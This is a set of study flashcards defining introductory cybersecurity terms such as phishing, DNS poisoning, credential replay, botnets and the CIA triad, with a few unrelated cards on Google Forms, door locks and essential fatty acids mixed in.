ping of death
sending malicious or malformed ping
bluejacking
sending unsolicited messages over Bluethooth or Bluetooth-enabled devices to another Bluetooth-enabled device
Flooding attacks
sends too many packets for targets to handle. Exhausts resources replying to packets.
TLS Weakness
server certificate can be spoofed. NSA has access. TCP/IP not encrypted
CSRF preventions
server should check request headers. anti-CSRF tokens
cryptosystem
set of algorithm required to implement cryptography
public key infrastructure
set of roles, policies, and procedures need to create, manage, distribute, use, store, and revoke digital certificates
7 form components used to collect information online using Google Forms
short answer, multiple choice, drop down, paragraph, check boxes, linear scale, multiple choice grid
DNS poisoning
situation in which DNS server resolves a host name into an incorrect IP address
critical software flaws
software bugs in operating systems can create what?
rootkit
software designed to hide existence of certain process/programs from normal methods of detection
Attacking
the attacker accomplishes their goal
Password problems
the average person has between 7 and 25 accounts they log into every day people report authenticating about 15 times in a typical work day on average 70% of people do not use a unique password for each website around 82% of people have forgotten a password used many don't pick strong passwords
A lock that extends a solid metal bar into the door frame for extra security is the ____________.
the dead bolt lock
security
the degree of protection against criminal activity danger damage and or loss
TLS and SSL
transport layer security and secure socket layer used for credit card purchases and online banking - indicated by HTTPS -form of encryption
honeypot
trap set to detect or deflect attempts at unauthorised use of information systems
digital certificate
type of electronic business card that is attached to internet transaction data to verify the sender of the data
firewalking
ultilises traceroute techniques and TTL values to determine gateway ACL filter and map network
risk acceptance
understand level of risk and not implementing a countermeasure
zero-day vulnerability
undisclosed computer-software vulnerability
something about you
unique physical characteristics such as fingerprints, retinal patters, & facial features
Virus/Trojan/Worm Prevention
update, harden system to only allow some to access, malware awareness.
technical control (logical)
use of software and data to monitor and control access
Redirect
used by routers to tell hosts 'send messages meant for 1.2.3.4 IP to 5.6.7.8"
What is a thumbnail used for in relation to an image gallery?
used to create a uniform and clean look that is a preview for the actual image once u click on the thumbnail (thumbnail size 85)
Ipconfig
used to obtain local information about network IP addresses, MAC address, gateways, DHCP hosts, ect.
antivirus software
uses several techniques to find viruses, worms, & spyware on a computer system; remove them if possible
Unauthorized use
using a computer for unauthorized activities
unauthorized use
using a computer for unauthorized activities
Dorking
using advanced google searches to reveal vulnerable websites
google hacking
using google applications to find security holes in configuration and computer code that websites use
key
value that comprises a large sequence of random bits/numbers/characters
which of the following cannot be used along with fencing as a security perimeter?
vapor barrier
VPNS
virtual private network integrate global connectrivy of internet with security of private network - use encryption to enhance privacy - use tunnelling
Anti virus Sandboxing
virus must decrypt on execution. Run program in virtual environment.
What does Social engineering look like?
• A cybercriminal befriends one of our clients and builds trust over time, until they are able to solicit sensitive information from them. • That information can then be used to commit fraud.
What is Viruses?
• A virus is a piece of software that has been written to insert copies of itself into applications and data and onto crucial parts of a computer's hard disk. • Even where no harm is intended, viruses consume memory, disk space and processing power.
What does phishing look like?
• An email, phone call or text message from a seemingly legitimate email address or number instructs you to click on a link to take action (e.g., "validate your account," "confirm your identity," "access your tax refund", "reset your paswwrod," etc.) • The link brings you to a website requiring you to enter your personal/sensetive/secret information.
Privacy Amendment (Enhancing Privacy Protection) Act 2012 applies to:
• Australian federal government agencies, • ACT and Norfolk Island government agencies, • Private-‐sector businesses with annual turnover > $3million • Private sector health service providers
Authenticity Attack - Fabrication
• Authentication - Information really came from the right person we think it came from - Verification of the identity of the person. • Authenticityattack - Unauthorized assumption of other's identity - Generate and distribute objects under this identity.
Implementing Security Objectives? AAAA
• Authentication - Who are you? - Prove what you claim you are. • Authorization/Access control - Control who is allowed to do what to the information assets - Are you allowed to do this and that? Under which condition(s)? • Auditing - Check if anything went wrong • Action - If so, take action to rectify the 'wrong.'
Access Control to Assets
• Authentication (Prove what you claim you are.) - Submit credentials to access an asset (function, information) • e.g., password, fingerprint, identification card • Authorization (Prove you have permission to do this) - Must be authorized to gain access to specific data, other computing resources. • e.g., file systems, firewalls, application authorization model • Various levels of granularity
Sources of Software Vulnerabilities
• Bugs in the application or its infrastructure - Doesn't do what it should do • access flag can be modified by user input • Inappropriate features in the infrastructure - Does something that it shouldn't do • functionality winning over security • a search function that can display other users info • Inappropriate use of features provided by the infrastructure • Main causes: - Complexity of these features • functionality winning over security, again - Ignorance of developers
Spyware Symptoms
• Changes to your browser homepage/start page. • Ending up on a strange site when conducting a search. • System-based firewall is turned off automatically. • Lots of network activity while not particularly active. • Excessive pop-up windows. • New icons, programs, favorites which you did not add. • Frequent firewall alerts about unknown programs when trying to access the Internet. • Poor system performance.
Security Objectives: CIA Triad
• Confidentiality (or secrecy) - Unauthorized users cannot read information - Ensuring information is disclosed to, and reviewed exclusively by intended recipients / authorized individuals - Authenticity of the user. • Integrity - Ensuring the accuracy and completeness of information and processing methods - Unauthorized users cannot alter/tamper information • Availability - Authorized users can always access to their computing assets (information and functions) - Ensuring that information and associated assets are accessible, whenever necessary, by authorized individuals
Defense and control: Non-IT Related Countermeasures
• Countermeasures can be non-IT related - Physical security of building and computers - Screening of personnel - Legal framework to deter criminals - Training employee.
How does Call forwarding happen?
• Cybercriminals scam the phone company into forwarding phone calls. • They may also use scanners, eavesdrop, clone our client's phone identity, and sell bogus ringtones or other gadgets to access our client's phone.
Attack on Availability
• Destroy hardware (cutting fiber) or software • Modify software in a subtle way • Corrupt packets in transit • Blatant denial of service (DoS): - Crashing the server - Overwhelm the server (use up its resource)
Defense and control : Example Security Technologies (mechanisms/countermeasures)
• Encryption - To ensure confidentiality and integrity - To ensure secure communication and storage. • Access control - To withstand threats related to misbehaving users - Role-based access control (RBAC) - Attribute-based access control (ABAC), etc. • Language-based security - To defeat threats related to misbehaving programs • Memory-safety • Sandboxing - Java, .NET/C#
Computer Defense Today
• Encryption • Multiple controls: - System Perimeter: Defines „inside/outside" - Preemption: Attacker scared away - Deterrence: Attacker could not overcome defenses - Faux Environment (e.g. honeypot, sandbox): attack deflected towards a worthless target (but the attacker doesn't know about it!) - Layered Defense * Multilevel defense * Defense in depth (ideal!): a concept in which multiple layers of security controls are placed through redundancy • Software controls • Hardware controls • Policies and procedures • Physical controls.
How does Credential Replay happen?
• If the cybercriminal is not stealing these credentials themselves, they can easily purchase large numbers of stolen login credentials from the dark web. • These large volumes of credentials typically come from data breaches (e.g. Yahoo, Verizon, LinkedIn, etc.).
What is Credential Replay
• Most people re-use passwords and usernames (aka 'credentials'). • Cybercriminals obtain these login credentials, test them in large numbers against financial institutions' websites to find matches, and then request fraudulent fund transfers. • Alternatively, they may resell this information to other cybercriminals to make a profit. • Those cybercriminals may then use this information to commit fraud.
How does Social engineering happen?
• Often cybercriminals contact victims by phone, email, or through social media.
Methods of Defense
• Prevention - Measures to stop breaches of security goals - Prevent attackers from violating security policy • Detection - measures to detect breaches of security goals - Detect attackers' violation of security policy • Deter attack - Make attack harder (can't make it impossibleL) • Deflect attack - Make another target more attractive than this target • Reaction - measures to recover assets, repair damage, and persecute (and deter) offenders - Continue to function correctly even if attack succeeds • Good prevention does not make detection & reaction redundant - Breaking into any house with windows is made impossible - Despite this prevention, detection (CCTV) & reaction (Alarm) still deter burglars.
Public vs. privacy
• Public - Already a matter of public record or knowledge - Freely distributed and accessible by anyone. • Privacy - Personal information (often called PII - personally identifiable information) - Information that can NOT be used on its own or with other information to identif contact, or locate an individual, or to identify an individual in context. - Privacy is strongly related to confidentiality, but these two are not same. - Identity information, financial records, healthcare records, etc. - Internal plans and other operating information that should not be made public
security evaluation
• Security Capability Maturity Model • The Orange Book • Common Criteria Standard • NICE • The Rainbow Series
What is NOT a Security Issue
• Software may crash • Networks may go down • Hardware components may fail • Human operator may make mistake • Any failures not attributed to some deliberate human actions • Accidental failures would count as reliability issue • Operating mistakes might be a usability issue • Security is concerned with intentional failures • It is a people problem, cannot be solved by technology alone.
Spam
• Spamming is the abuse of electronic messaging systems to send unsolicited, undesired bulk messages • Spam media includes: • e-mail spam (most widely recognized form) • Instant messaging spam • Usenet newsgroup spam • Web search engine spam • Spam in blogs • Mobile phone messaging spam
. Stakeholders • Assets • Stakeholders own assets • Threats to assets • Attack to assets • Mechanisms/Countermeasures • Vulnerability
• Stakeholders - owners, individual, companies,... • Assets - data, functionality, service, software,... • Stakeholders own assets - medical data is owned by patient • Threats to assets - intention to erase, steal, modify,... • Attack to assets - already erased, stolen, modified,... • Attackers who pose threats or launched attacks to assets - employees, clients, script kiddies, criminals, anyone,... • Mechanisms/Countermeasures to protect assets - encryption, password,... • Vulnerability is the weakness in the mechanisms/countermeasures - weak password,...
Integrity Attack - Tampering With Messages
• Stop the flow of the message • Delay and optionally modify the message • Release the message again
What's the impact of Social engineering?
• The criminal commits fraud, steals our client's money, and then they disappear.
How does phishing happen?
• The cybercriminal masquerades as a legitimate source (e.g., financial institution employee, client, banker) • You believe the request is from a trusted source and you unwittingly oblige when they ask you for your personal information.
How does Spoofing happen?
• There are easy tools available to cybercriminals that help to mask the source/sender. • For example, the cybercriminal can create an email address nearly identical to our client's email address (i.e., off by a character), so that, at-a-glance, the email address appears legitimate. • The cybercriminal is relying on our lack of attention to detail in order to commit the fraud.
Purpose of Botnets
• These botnet attacks might be sending spam emails, or flooding a website with so many requests for content that the server cannot cope, which is known as a denial-of- service attack. • A single piece of malware can cause enormous damage, but when thousands, or even millions of computers run the same program, their effects can be devastating. - The effects of a coordinated attack can mean websites struggle to remain online while the botnet targets their computers. • There are also a number of harmless botnets used for such purposes as the Internet Relay Chat (IRC) text messaging program, but the vast majority are created by malware.
Eavesdropping - Message Interception (Attack on Confidentiality)
• Unauthorized access to information • Illicit copying of files and programs • Packet sniffers and wire tappers - A packet analyzer (also known as a packet sniffer) is an act that can intercept and log traffic that passes over a network. - Packet sniffer is the process of intercepting and logging traffic. - As data streams flow across the network, the sniffer captures each packet - The sniffer decodes the packet's raw data, finding the values of various fields in the packet - The sniffer also analyzes data content of the packet to understand the values of information. - This can be with specific objective or without any objective.
Unsaturated Fatty acids: Essential Fatty acids (EFA)
•Definition of an essential nutrient: -Cannot be synthesized in sufficient amounts to support normal growth or life -It or a derivative of it must have some essential biological function. •Essential fatty acids are essential because: -Animals cannot insert the double bonds in the right location -EFA are metabolized to a group of compounds called eicosanoids that have essential biological functions. -EFA are also important in cell membrane structure as part of phospholipids